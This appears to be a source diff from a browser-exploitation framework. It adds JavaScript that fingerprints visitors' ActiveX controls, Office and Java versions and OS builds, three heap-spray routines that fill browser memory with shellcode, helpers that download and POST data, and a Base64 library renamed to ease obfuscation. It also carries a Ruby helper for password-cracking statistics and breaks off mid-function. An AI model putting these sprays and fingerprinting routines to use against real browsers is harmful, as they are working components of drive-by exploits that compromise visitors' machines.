[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
|
||||
)
|
||||
|
||||
charset = nil
|
||||
filename = "stats_out"
|
||||
|
||||
opts.each do |opt, arg|
|
||||
case opt
|
||||
when '--help'
|
||||
help
|
||||
when '--file'
|
||||
filename = arg
|
||||
when '--num'
|
||||
charset = ch_num
|
||||
when '--alpha'
|
||||
charset = ch_alpha
|
||||
when '--alphamaj'
|
||||
charset = ch_alpha.capitalize
|
||||
when '--alphanum'
|
||||
charset = ch_alpha + ch_num
|
||||
when '--alphanummaj'
|
||||
charset = ch_alpha.capitalize + ch_num
|
||||
when '--all'
|
||||
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
|
||||
when '--custom'
|
||||
charset = arg
|
||||
end
|
||||
case opt
|
||||
when '--help'
|
||||
help
|
||||
when '--file'
|
||||
filename = arg
|
||||
when '--num'
|
||||
charset = ch_num
|
||||
when '--alpha'
|
||||
charset = ch_alpha
|
||||
when '--alphamaj'
|
||||
charset = ch_alpha.capitalize
|
||||
when '--alphanum'
|
||||
charset = ch_alpha + ch_num
|
||||
when '--alphanummaj'
|
||||
charset = ch_alpha.capitalize + ch_num
|
||||
when '--all'
|
||||
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
|
||||
when '--custom'
|
||||
charset = arg
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
if charset == nil
|
||||
help
|
||||
help
|
||||
end
|
||||
|
||||
|
||||
fstat = File.open(filename, "w")
|
||||
charset.each_byte do |c|
|
||||
fstat.write("1=proba1[#{c.to_s}]\n")
|
||||
charset.each_byte do |tmp|
|
||||
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
|
||||
end
|
||||
fstat.write("1=proba1[#{c.to_s}]\n")
|
||||
charset.each_byte do |tmp|
|
||||
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
|
||||
end
|
||||
end
|
||||
fstat.close
|
||||
|
||||
|
|
|
@ -3,20 +3,20 @@
|
|||
require 'getoptlong'
|
||||
|
||||
def help
|
||||
puts "Usage: #{$0} [options]"
|
||||
puts "\t-h --help\t\tthis help."
|
||||
puts "\t-f --file\t\toutput file."
|
||||
puts "\t-n --num\t\tcharset: 0123456789"
|
||||
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
|
||||
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
|
||||
puts "\t-l --alphanum\t\tcharset: alpha + num"
|
||||
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
|
||||
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
|
||||
puts "\t-c --custom"
|
||||
puts "\nExample:\n"
|
||||
puts "#{$0} -f stats -s"
|
||||
puts "#{$0} -f stats -c \"0123abc+=\""
|
||||
exit
|
||||
puts "Usage: #{$0} [options]"
|
||||
puts "\t-h --help\t\tthis help."
|
||||
puts "\t-f --file\t\toutput file."
|
||||
puts "\t-n --num\t\tcharset: 0123456789"
|
||||
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
|
||||
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
|
||||
puts "\t-l --alphanum\t\tcharset: alpha + num"
|
||||
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
|
||||
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
|
||||
puts "\t-c --custom"
|
||||
puts "\nExample:\n"
|
||||
puts "#{$0} -f stats -s"
|
||||
puts "#{$0} -f stats -c \"0123abc+=\""
|
||||
exit
|
||||
end
|
||||
|
||||
ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
|
||||
|
@ -24,55 +24,55 @@ ch_num = '0123456789'
|
|||
ch_sp = '!@#$+=.*'
|
||||
|
||||
opts = GetoptLong.new(
|
||||
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
|
||||
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
|
||||
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
|
||||
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
|
||||
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
|
||||
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
|
||||
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
|
||||
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
|
||||
)
|
||||
|
||||
charset = nil
|
||||
filename = "stats_out"
|
||||
|
||||
opts.each do |opt, arg|
|
||||
case opt
|
||||
when '--help'
|
||||
help
|
||||
when '--file'
|
||||
filename = arg
|
||||
when '--num'
|
||||
charset = ch_num
|
||||
when '--alpha'
|
||||
charset = ch_alpha
|
||||
when '--alphamaj'
|
||||
charset = ch_alpha.capitalize
|
||||
when '--alphanum'
|
||||
charset = ch_alpha + ch_num
|
||||
when '--alphanummaj'
|
||||
charset = ch_alpha.capitalize + ch_num
|
||||
when '--all'
|
||||
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
|
||||
when '--custom'
|
||||
charset = arg
|
||||
end
|
||||
case opt
|
||||
when '--help'
|
||||
help
|
||||
when '--file'
|
||||
filename = arg
|
||||
when '--num'
|
||||
charset = ch_num
|
||||
when '--alpha'
|
||||
charset = ch_alpha
|
||||
when '--alphamaj'
|
||||
charset = ch_alpha.capitalize
|
||||
when '--alphanum'
|
||||
charset = ch_alpha + ch_num
|
||||
when '--alphanummaj'
|
||||
charset = ch_alpha.capitalize + ch_num
|
||||
when '--all'
|
||||
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
|
||||
when '--custom'
|
||||
charset = arg
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
if charset == nil
|
||||
help
|
||||
help
|
||||
end
|
||||
|
||||
|
||||
fstat = File.open(filename, "w")
|
||||
charset.each_byte do |c|
|
||||
fstat.write("1=proba1[#{c.to_s}]\n")
|
||||
charset.each_byte do |tmp|
|
||||
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
|
||||
end
|
||||
fstat.write("1=proba1[#{c.to_s}]\n")
|
||||
charset.each_byte do |tmp|
|
||||
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
|
||||
end
|
||||
end
|
||||
fstat.close
|
||||
|
||||
|
|
|
@ -3,20 +3,20 @@
|
|||
require 'getoptlong'
|
||||
|
||||
def help
|
||||
puts "Usage: #{$0} [options]"
|
||||
puts "\t-h --help\t\tthis help."
|
||||
puts "\t-f --file\t\toutput file."
|
||||
puts "\t-n --num\t\tcharset: 0123456789"
|
||||
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
|
||||
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
|
||||
puts "\t-l --alphanum\t\tcharset: alpha + num"
|
||||
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
|
||||
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
|
||||
puts "\t-c --custom"
|
||||
puts "\nExample:\n"
|
||||
puts "#{$0} -f stats -s"
|
||||
puts "#{$0} -f stats -c \"0123abc+=\""
|
||||
exit
|
||||
puts "Usage: #{$0} [options]"
|
||||
puts "\t-h --help\t\tthis help."
|
||||
puts "\t-f --file\t\toutput file."
|
||||
puts "\t-n --num\t\tcharset: 0123456789"
|
||||
puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
|
||||
puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
|
||||
puts "\t-l --alphanum\t\tcharset: alpha + num"
|
||||
puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
|
||||
puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
|
||||
puts "\t-c --custom"
|
||||
puts "\nExample:\n"
|
||||
puts "#{$0} -f stats -s"
|
||||
puts "#{$0} -f stats -c \"0123abc+=\""
|
||||
exit
|
||||
end
|
||||
|
||||
ch_alpha = 'abcdefghijklmnopqrstuvwxyz'
|
||||
|
@ -24,55 +24,55 @@ ch_num = '0123456789'
|
|||
ch_sp = '!@#$+=.*'
|
||||
|
||||
opts = GetoptLong.new(
|
||||
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
|
||||
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
|
||||
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
|
||||
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
|
||||
[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
|
||||
[ '--all', '-s', GetoptLong::NO_ARGUMENT],
|
||||
[ '--num', '-n', GetoptLong::NO_ARGUMENT],
|
||||
[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
|
||||
[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
|
||||
)
|
||||
|
||||
charset = nil
|
||||
filename = "stats_out"
|
||||
|
||||
opts.each do |opt, arg|
|
||||
case opt
|
||||
when '--help'
|
||||
help
|
||||
when '--file'
|
||||
filename = arg
|
||||
when '--num'
|
||||
charset = ch_num
|
||||
when '--alpha'
|
||||
charset = ch_alpha
|
||||
when '--alphamaj'
|
||||
charset = ch_alpha.capitalize
|
||||
when '--alphanum'
|
||||
charset = ch_alpha + ch_num
|
||||
when '--alphanummaj'
|
||||
charset = ch_alpha.capitalize + ch_num
|
||||
when '--all'
|
||||
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
|
||||
when '--custom'
|
||||
charset = arg
|
||||
end
|
||||
case opt
|
||||
when '--help'
|
||||
help
|
||||
when '--file'
|
||||
filename = arg
|
||||
when '--num'
|
||||
charset = ch_num
|
||||
when '--alpha'
|
||||
charset = ch_alpha
|
||||
when '--alphamaj'
|
||||
charset = ch_alpha.capitalize
|
||||
when '--alphanum'
|
||||
charset = ch_alpha + ch_num
|
||||
when '--alphanummaj'
|
||||
charset = ch_alpha.capitalize + ch_num
|
||||
when '--all'
|
||||
charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
|
||||
when '--custom'
|
||||
charset = arg
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
if charset == nil
|
||||
help
|
||||
help
|
||||
end
|
||||
|
||||
|
||||
fstat = File.open(filename, "w")
|
||||
charset.each_byte do |c|
|
||||
fstat.write("1=proba1[#{c.to_s}]\n")
|
||||
charset.each_byte do |tmp|
|
||||
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
|
||||
end
|
||||
fstat.write("1=proba1[#{c.to_s}]\n")
|
||||
charset.each_byte do |tmp|
|
||||
fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
|
||||
end
|
||||
end
|
||||
fstat.close
|
||||
|
||||
|
|
|
@ -0,0 +1,89 @@
|
|||
window.ie_addons_detect = { };
|
||||
|
||||
/**
|
||||
* Returns true if this ActiveX is available, otherwise false.
|
||||
* Grabbed this directly from browser_autopwn.rb
|
||||
**/
|
||||
window.ie_addons_detect.hasActiveX = function (axo_name, method) {
|
||||
var axobj = null;
|
||||
if (axo_name.substring(0,1) == String.fromCharCode(123)) {
|
||||
axobj = document.createElement("object");
|
||||
axobj.setAttribute("classid", "clsid:" + axo_name);
|
||||
axobj.setAttribute("id", axo_name);
|
||||
axobj.setAttribute("style", "visibility: hidden");
|
||||
axobj.setAttribute("width", "0px");
|
||||
axobj.setAttribute("height", "0px");
|
||||
document.body.appendChild(axobj);
|
||||
if (typeof(axobj[method]) == 'undefined') {
|
||||
var attributes = 'id="' + axo_name + '"';
|
||||
attributes += ' classid="clsid:' + axo_name + '"';
|
||||
attributes += ' style="visibility: hidden"';
|
||||
attributes += ' width="0px" height="0px"';
|
||||
document.body.innerHTML += "<object " + attributes + "></object>";
|
||||
axobj = document.getElementById(axo_name);
|
||||
}
|
||||
} else {
|
||||
try {
|
||||
axobj = new ActiveXObject(axo_name);
|
||||
} catch(e) {
|
||||
// If we can't build it with an object tag and we can't build it
|
||||
// with ActiveXObject, it can't be built.
|
||||
return false;
|
||||
};
|
||||
}
|
||||
if (typeof(axobj[method]) != 'undefined') {
|
||||
return true;
|
||||
}
|
||||
|
||||
return false;
|
||||
};
|
||||
|
||||
/**
|
||||
* Returns the version of Microsoft Office. If not found, returns null.
|
||||
**/
|
||||
window.ie_addons_detect.getMsOfficeVersion = function () {
|
||||
var version;
|
||||
var types = new Array();
|
||||
for (var i=1; i <= 5; i++) {
|
||||
try {
|
||||
types[i-1] = typeof(new ActiveXObject("SharePoint.OpenDocuments." + i.toString()));
|
||||
}
|
||||
catch (e) {
|
||||
types[i-1] = null;
|
||||
}
|
||||
}
|
||||
|
||||
if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
|
||||
types[3] == 'object' && types[4] == 'object')
|
||||
{
|
||||
version = "2012";
|
||||
}
|
||||
else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
|
||||
types[3] == 'object' && types[4] == null)
|
||||
{
|
||||
version = "2010";
|
||||
}
|
||||
else if (types[0] == 'object' && types[1] == 'object' && types[2] == 'object' &&
|
||||
types[3] == null && types[4] == null)
|
||||
{
|
||||
version = "2007";
|
||||
}
|
||||
else if (types[0] == 'object' && types[1] == 'object' && types[2] == null &&
|
||||
types[3] == null && types[4] == null)
|
||||
{
|
||||
version = "2003";
|
||||
}
|
||||
else if (types[0] == 'object' && types[1] == null && types[2] == null &&
|
||||
types[3] == null && types[4] == null)
|
||||
{
|
||||
// If run for the first time, you must manullay allow the "Microsoft Office XP"
|
||||
// add-on to run. However, this prompt won't show because the ActiveXObject statement
|
||||
// is wrapped in an exception handler.
|
||||
version = "xp";
|
||||
}
|
||||
else {
|
||||
version = null;
|
||||
}
|
||||
|
||||
return version;
|
||||
}
|
|
@ -0,0 +1,64 @@
|
|||
window.misc_addons_detect = { };
|
||||
|
||||
/**
|
||||
* Returns the Java version
|
||||
**/
|
||||
window.misc_addons_detect.getJavaVersion = function () {
|
||||
var foundVersion = null;
|
||||
|
||||
//
|
||||
// This finds the Java version from Java WebStart's ActiveX control
|
||||
// This is specific to Windows
|
||||
//
|
||||
for (var i1=0; i1 < 10; i1++) {
|
||||
for (var i2=0; i2 < 10; i2++) {
|
||||
for (var i3=0; i3 < 10; i3++) {
|
||||
for (var i4=0; i4 < 10; i4++) {
|
||||
var version = String(i1) + "." + String(i2) + "." + String(i3) + "." + String(i4);
|
||||
var progId = "JavaWebStart.isInstalled." + version;
|
||||
try {
|
||||
new ActiveXObject(progId);
|
||||
return version;
|
||||
}
|
||||
catch (e) {
|
||||
continue;
|
||||
}
|
||||
}}}}
|
||||
|
||||
//
|
||||
// This finds the Java version from window.navigator.mimeTypes
|
||||
// This seems to work pretty well for most browsers except for IE
|
||||
//
|
||||
if (foundVersion == null) {
|
||||
var mimes = window.navigator.mimeTypes;
|
||||
for (var i=0; i<mimes.length; i++) {
|
||||
var m = /java.+;version=(.+)/.exec(mimes[i].type);
|
||||
if (m) {
|
||||
var version = parseFloat(m[1]);
|
||||
if (version > foundVersion) {
|
||||
foundVersion = version;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
//
|
||||
// This finds the Java version from navigator plugins
|
||||
// This is necessary for Windows + Firefox setup, but the check isn't as good as the mime one.
|
||||
// So we do this last.
|
||||
//
|
||||
if (foundVersion == null) {
|
||||
var foundJavaString = "";
|
||||
var pluginsCount = navigator.plugins.length;
|
||||
for (i=0; i < pluginsCount; i++) {
|
||||
var pluginName = navigator.plugins[i].name;
|
||||
var pluginVersion = navigator.plugins[i].version;
|
||||
if (/Java/.test(pluginName) && pluginVersion != undefined) {
|
||||
foundVersion = navigator.plugins[i].version;
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return foundVersion;
|
||||
}
|
|
@ -52,6 +52,13 @@ window.os_detect.getVersion = function(){
|
|||
return d.style[propCamelCase] === css;
|
||||
}
|
||||
|
||||
var input_type_is_valid = function(input_type) {
|
||||
if (!document.createElement) return false;
|
||||
var input = document.createElement('input');
|
||||
input.setAttribute('type', input_type);
|
||||
return input.type == input_type;
|
||||
}
|
||||
|
||||
//--
|
||||
// Client
|
||||
//--
|
||||
|
@ -203,32 +210,42 @@ window.os_detect.getVersion = function(){
|
|||
// Thanks to developer.mozilla.org "Firefox for developers" series for most
|
||||
// of these.
|
||||
// Release changelogs: http://www.mozilla.org/en-US/firefox/releases/
|
||||
if ('HTMLTimeElement' in window) {
|
||||
ua_version = '22.0'
|
||||
if (css_is_valid('background-attachment',
|
||||
'backgroundAttachment',
|
||||
'local')) {
|
||||
ua_version = '25.0';
|
||||
} else if ('DeviceStorage' in window && window.DeviceStorage &&
|
||||
'default' in window.DeviceStorage.prototype) {
|
||||
// https://bugzilla.mozilla.org/show_bug.cgi?id=874213
|
||||
ua_version = '24.0';
|
||||
} else if (input_type_is_valid('range')) {
|
||||
ua_version = '23.0';
|
||||
} else if ('HTMLTimeElement' in window) {
|
||||
ua_version = '22.0';
|
||||
} else if ('createElement' in document &&
|
||||
document.createElement('main') &&
|
||||
document.createElement('main').constructor === window['HTMLElement']) {
|
||||
ua_version = '21.0'
|
||||
ua_version = '21.0';
|
||||
} else if ('imul' in Math) {
|
||||
ua_version = '20.0'
|
||||
ua_version = '20.0';
|
||||
} else if (css_is_valid('font-size', 'fontSize', '23vmax')) {
|
||||
ua_version = '19.0'
|
||||
ua_version = '19.0';
|
||||
} else if ('devicePixelRatio' in window) {
|
||||
ua_version = '18.0'
|
||||
ua_version = '18.0';
|
||||
} else if ('createElement' in document &&
|
||||
document.createElement('iframe') &&
|
||||
'sandbox' in document.createElement('iframe')) {
|
||||
ua_version = '17.0'
|
||||
ua_version = '17.0';
|
||||
} else if ('mozApps' in navigator && 'install' in navigator.mozApps) {
|
||||
ua_version = '16.0'
|
||||
ua_version = '16.0';
|
||||
} else if ('HTMLSourceElement' in window &&
|
||||
HTMLSourceElement.prototype &&
|
||||
'media' in HTMLSourceElement.prototype) {
|
||||
ua_version = '15.0'
|
||||
ua_version = '15.0';
|
||||
} else if ('mozRequestPointerLock' in document.body) {
|
||||
ua_version = '14.0'
|
||||
ua_version = '14.0';
|
||||
} else if ('Map' in window) {
|
||||
ua_version = "13.0"
|
||||
ua_version = "13.0";
|
||||
} else if ('mozConnection' in navigator) {
|
||||
ua_version = "12.0";
|
||||
} else if ('mozVibrate' in navigator) {
|
||||
|
@ -850,6 +867,12 @@ window.os_detect.getVersion = function(){
|
|||
os_flavor = "7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "10016720":
|
||||
// IE 10.0.9200.16721 / Windows 7 SP1
|
||||
ua_version = "10.0";
|
||||
os_flavor = "7";
|
||||
os_sp = "SP1";
|
||||
break;
|
||||
case "1000":
|
||||
// IE 10.0.8400.0 (Pre-release + KB2702844), Windows 8 x86 English Pre-release
|
||||
ua_version = "10.0";
|
|
@ -0,0 +1,17 @@
|
|||
var memory = new Array();
|
||||
function sprayHeap(shellcode, heapSprayAddr, heapBlockSize) {
|
||||
var index;
|
||||
var heapSprayAddr_hi = (heapSprayAddr >> 16).toString(16);
|
||||
var heapSprayAddr_lo = (heapSprayAddr & 0xffff).toString(16);
|
||||
while (heapSprayAddr_hi.length < 4) { heapSprayAddr_hi = "0" + heapSprayAddr_hi; }
|
||||
while (heapSprayAddr_lo.length < 4) { heapSprayAddr_lo = "0" + heapSprayAddr_lo; }
|
||||
|
||||
var retSlide = unescape("%u"+heapSprayAddr_hi + "%u"+heapSprayAddr_lo);
|
||||
while (retSlide.length < heapBlockSize) { retSlide += retSlide; }
|
||||
retSlide = retSlide.substring(0, heapBlockSize - shellcode.length);
|
||||
|
||||
var heapBlockCnt = (heapSprayAddr - heapBlockSize)/heapBlockSize;
|
||||
for (index = 0; index < heapBlockCnt; index++) {
|
||||
memory[index] = retSlide + shellcode;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,31 @@
|
|||
function mstime_malloc(oArg) {
|
||||
var shellcode = oArg.shellcode;
|
||||
var offset = oArg.offset;
|
||||
var heapBlockSize = oArg.heapBlockSize;
|
||||
var objId = oArg.objId;
|
||||
|
||||
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
|
||||
if (offset == undefined) { offset = 0; }
|
||||
if (heapBlockSize == undefined) { throw "Size must be defined"; }
|
||||
|
||||
var buf = "";
|
||||
for (var i=0; i < heapBlockSize/4; i++) {
|
||||
if (i == offset) {
|
||||
if (i == 0) { buf += shellcode; }
|
||||
else { buf += ";" + shellcode; }
|
||||
}
|
||||
else {
|
||||
buf += ";#W00TA";
|
||||
}
|
||||
}
|
||||
|
||||
var e = document.getElementById(objId);
|
||||
if (e == null) {
|
||||
var eleId = "W00TB"
|
||||
var acTag = "<t:ANIMATECOLOR id='"+ eleId + "'/>"
|
||||
document.body.innerHTML = document.body.innerHTML + acTag;
|
||||
e = document.getElementById(eleId);
|
||||
}
|
||||
try { e.values = buf; }
|
||||
catch (e) {}
|
||||
}
|
|
@ -0,0 +1,38 @@
|
|||
var sym_div_container;
|
||||
function sprayHeap( oArg ) {
|
||||
var shellcode = oArg.shellcode;
|
||||
var offset = oArg.offset;
|
||||
var heapBlockSize = oArg.heapBlockSize;
|
||||
var maxAllocs = oArg.maxAllocs;
|
||||
var objId = oArg.objId;
|
||||
|
||||
if (shellcode == undefined) { throw "Missing argument: shellcode"; }
|
||||
if (offset == undefined) { offset = 0x00; }
|
||||
if (heapBlockSize == undefined) { heapBlockSize = 0x80000; }
|
||||
if (maxAllocs == undefined) { maxAllocs = 0x350; }
|
||||
|
||||
if (offset > 0x800) { throw "Bad alignment"; }
|
||||
|
||||
sym_div_container = document.getElementById(objId);
|
||||
|
||||
if (sym_div_container == null) {
|
||||
sym_div_container = document.createElement("div");
|
||||
}
|
||||
|
||||
sym_div_container.style.cssText = "display:none";
|
||||
var data;
|
||||
junk = unescape("%u2020%u2020");
|
||||
while (junk.length < offset+0x1000) junk += junk;
|
||||
|
||||
data = junk.substring(0,offset) + shellcode;
|
||||
data += junk.substring(0,0x800-offset-shellcode.length);
|
||||
|
||||
while (data.length < heapBlockSize) data += data;
|
||||
|
||||
for (var i = 0; i < maxAllocs; i++)
|
||||
{
|
||||
var obj = document.createElement("button");
|
||||
obj.title = data.substring(0, (heapBlockSize-2)/2);
|
||||
sym_div_container.appendChild(obj);
|
||||
}
|
||||
}
|
|
@ -0,0 +1,18 @@
|
|||
function ajax_download(oArg) {
|
||||
if (!oArg.method) { oArg.method = "GET"; }
|
||||
if (!oArg.path) { throw "Missing parameter 'path'"; }
|
||||
if (!oArg.data) { oArg.data = null; }
|
||||
|
||||
var xmlHttp = new XMLHttpRequest();
|
||||
|
||||
if (xmlHttp.overrideMimeType) {
|
||||
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
|
||||
}
|
||||
|
||||
xmlHttp.open(oArg.method, oArg.path, false);
|
||||
xmlHttp.send(oArg.data);
|
||||
if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
|
||||
return xmlHttp.responseText;
|
||||
}
|
||||
return null;
|
||||
}
|
|
@ -0,0 +1,10 @@
|
|||
function postInfo(path, data) {
|
||||
var xmlHttp = new XMLHttpRequest();
|
||||
|
||||
if (xmlHttp.overrideMimeType) {
|
||||
xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
|
||||
}
|
||||
|
||||
xmlHttp.open('POST', path, false);
|
||||
xmlHttp.send(data);
|
||||
}
|
|
@ -0,0 +1,15 @@
|
|||
if (!window.XMLHTTPRequest) {
|
||||
(function() {
|
||||
var idx, activeObjs = ["Microsoft.XMLHTTP", "Msxml2.XMLHTTP", "Msxml2.XMLHTTP.6.0", "Msxml2.XMLHTTP.3.0"];
|
||||
for (idx = 0; idx < activeObjs.length; idx++) {
|
||||
try {
|
||||
new ActiveXObject(activeObjs[idx]);
|
||||
window.XMLHttpRequest = function() {
|
||||
return new ActiveXObject(activeObjs[idx]);
|
||||
};
|
||||
break;
|
||||
}
|
||||
catch (e) {}
|
||||
}
|
||||
})();
|
||||
}
|
|
@ -0,0 +1,126 @@
|
|||
// Base64 implementation stolen from http://www.webtoolkit.info/javascript-base64.html
|
||||
// variable names changed to make obfuscation easier
|
||||
var Base64 = {
|
||||
// private property
|
||||
_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
|
||||
|
||||
// private method
|
||||
_utf8_encode : function ( input ){
|
||||
input = input.replace(/\r\n/g,"\\n");
|
||||
var utftext = "";
|
||||
var input_idx;
|
||||
|
||||
for (input_idx = 0; input_idx < input.length; input_idx++) {
|
||||
var chr = input.charCodeAt(input_idx);
|
||||
if (chr < 128) {
|
||||
utftext += String.fromCharCode(chr);
|
||||
}
|
||||
else if((chr > 127) && (chr < 2048)) {
|
||||
utftext += String.fromCharCode((chr >> 6) | 192);
|
||||
utftext += String.fromCharCode((chr & 63) | 128);
|
||||
} else {
|
||||
utftext += String.fromCharCode((chr >> 12) | 224);
|
||||
utftext += String.fromCharCode(((chr >> 6) & 63) | 128);
|
||||
utftext += String.fromCharCode((chr & 63) | 128);
|
||||
}
|
||||
}
|
||||
|
||||
return utftext;
|
||||
},
|
||||
|
||||
// public method for encoding
|
||||
encode : function( input ) {
|
||||
var output = "";
|
||||
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
|
||||
var input_idx = 0;
|
||||
|
||||
input = Base64._utf8_encode(input);
|
||||
|
||||
while (input_idx < input.length) {
|
||||
chr1 = input.charCodeAt( input_idx++ );
|
||||
chr2 = input.charCodeAt( input_idx++ );
|
||||
chr3 = input.charCodeAt( input_idx++ );
|
||||
|
||||
enc1 = chr1 >> 2;
|
||||
enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
|
||||
enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
|
||||
enc4 = chr3 & 63;
|
||||
|
||||
if (isNaN(chr2)) {
|
||||
enc3 = enc4 = 64;
|
||||
} else if (isNaN(chr3)) {
|
||||
enc4 = 64;
|
||||
}
|
||||
output = output +
|
||||
this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
|
||||
this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
|
||||
}
|
||||
return output;
|
||||
},
|
||||
// public method for decoding
|
||||
decode : function (input) {
|
||||
var output = "";
|
||||
var chr1, chr2, chr3;
|
||||
var enc1, enc2, enc3, enc4;
|
||||
var i = 0;
|
||||
|
||||
input = input.replace(/[^A-Za-z0-9\+\/\\=]/g, "");
|
||||
|
||||
while (i < input.length) {
|
||||
|
||||
enc1 = this._keyStr.indexOf(input.charAt(i++));
|
||||
enc2 = this._keyStr.indexOf(input.charAt(i++));
|
||||
enc3 = this._keyStr.indexOf(input.charAt(i++));
|
||||
enc4 = this._keyStr.indexOf(input.charAt(i++));
|
||||
|
||||
chr1 = (enc1 << 2) | (enc2 >> 4);
|
||||
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
|
||||
chr3 = ((enc3 & 3) << 6) | enc4;
|
||||
|
||||
output = output + String.fromCharCode(chr1);
|
||||
|
||||
if (enc3 != 64) {
|
||||
output = output + String.fromCharCode(chr2);
|
||||
}
|
||||
if (enc4 != 64) {
|
||||
output = output + String.fromCharCode(chr3);
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
output = Base64._utf8_decode(output);
|
||||
|
||||
return output;
|
||||
|
||||
},
|
||||
_utf8_decode : function (utftext) {
|
||||
var string = "";
|
||||
var input_idx = 0;
|
||||
var chr1 = 0;
|
||||
var chr2 = 0;
|
||||
var chr3 = 0;
|
||||
|
||||
while ( input_idx < utftext.length ) {
|
||||
|
||||
chr1 = utftext.charCodeAt(input_idx);
|
||||
|
||||
if (chr1 < 128) {
|
||||
